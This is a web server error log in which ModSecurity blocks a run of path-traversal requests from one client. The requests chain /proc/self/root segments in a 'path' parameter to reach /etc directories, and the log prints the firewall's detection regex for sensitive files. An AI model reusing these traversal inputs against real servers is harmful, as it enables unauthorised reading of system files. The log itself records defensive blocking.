[Fri Mar 20 07:14:55.719612 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:47532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eH_HIg5MgXLBnicPvEwAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:57.021781 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:47540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eIfqxLDW4GITHUkTcJwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:58.350825 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:47548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eIhCii7xarUs8iHZebgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:01.010596 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:56814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eJRCii7xarUs8iHZecAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:03.361709 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:56814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eJxCii7xarUs8iHZecgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:05.069517 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:56824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eKeoXxyEfFpUF8f93_gAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:06.666338 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:56826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eKvXLqtnMIWvjpaKQ6AAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:07.991288 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:56832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eKwF0L0L-SsrnPo5e-QAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:09.949542 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:56836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eLda6ubjKNq_cu4bKdwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:12.903693 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:40284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eMLninkcc-iUj5ApV1QAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:14.269301 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.243.128:40298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eMvHIg5MgXLBnicPvHgAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:22.773947 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:40306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eOvqxLDW4GITHUkTcQgAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:24.147137 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:54092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ePAF0L0L-SsrnPo5fFQAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:25.540897 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:54104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ePV1pVZ5mVmJwsFMmHwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:28.347414 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:54118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eQPXLqtnMIWvjpaKRBgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:29.636712 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:39538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eQV1pVZ5mVmJwsFMmIgAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:30.969853 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:39542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eQrninkcc-iUj5ApV5QAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:15:44.159533 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:39554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eUNa6ubjKNq_cu4bKlgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:38.608146 2026] [mime_magic:error] [pid 10189:tid 140411632822016] (70014)End of file found: [client 57.141.18.13:43038] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:16:41.227085 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:49688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eida6ubjKNq_cu4bLBwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:41.852600 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:49688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eida6ubjKNq_cu4bLCQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:48.986545 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:54730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ekDJ3M9BSuKP7CAYRkQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
